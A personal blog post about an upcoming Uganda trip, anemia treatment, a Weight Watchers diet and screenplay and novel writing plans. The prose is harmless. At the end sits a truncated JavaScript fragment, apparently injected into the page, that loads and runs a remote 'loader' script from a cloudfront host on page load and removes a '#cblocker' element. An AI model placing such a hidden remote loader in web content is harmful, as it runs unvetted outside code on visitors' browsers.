Catching up and keeping up

24 Apr

We leave for Uganda in 9 days… wow! How did that get here so fast! The spring has been crazy, and April quite cold, but that best part is that I am feeling so very much better on the Irospan protocol for my anemia. What an amazing turn around! Wow! Zeke is about 5 weeks into his OTC iron, and he’s got a ton more energy, too. So on that front, things are great.

We’re not doing a safari this time, but we are going white water rafting on the Nile, and staying a night at Wildwaters. Wildwaters is one of my all time favorite places on the planet, truly an amazing resort and location. We’ll also be staying a night at one of our other Uganda favorites, the Kingfisher. Both of these are in Jinja. Then a night at the babies home in Bukaleba, and 2 nights in town. (Head to the Ten Eighteen blog here for more info!)

My whole family is doing Weight Watchers online, and for the most part, I can highly recommend their Points Plus program. Ryan and I have determined that it’s quite a bit trickier for women than for me… We get 26 daily points to their 44-48! So we all have 49 weekly points, but Ryan and I are using some of those just for regular eating, while the guys can “spend” them eating out or on treats. Eating out is probably the biggest issue unless you go to a chain restaurant or have sashimi… But I’ve lost 5 or the 7 lb I wanted to lose (having gained them eating carbs trying to have some energy during the anemia) in a month. And the iPhone app is great, because I can check points for things in the grocery. Overall, an A. (Now, in Uganda… Not sure how it’s going to work!)

I finished my Script Frenzy screenplay in about 13 days of writing, and it came out well. Since I’m not taking my laptop to Uganda, I will do an edit when I get back – it’s a bit too long at 130 pages. Also, I will resume sending out queries for Solomon’s Throne, and add queries for the screenplay (called Laid Waste), in June. Finally, on the writing front, I’ll be participating in Camp NaNo in June, and I’ve decided to write the Christian historical romance set in the Civil War, since I have an agent who has requested it, and will read it. I’ll do the Camp NaNo in August and write a screenplay based on a murder mystery I started in 2009.

I’m really ready for warm weather, for Uganda, for the beach and boating and no school and summer! And hopefully, I’ll update the blog a bit more often once I get back (we won’t have much power or internet for the 3 weeks we’re gone). Enjoy the spring!

// -1?’https’:’http’;var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.async=true;ccm.src=http+’://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});};
// ]]>

Leave a Reply

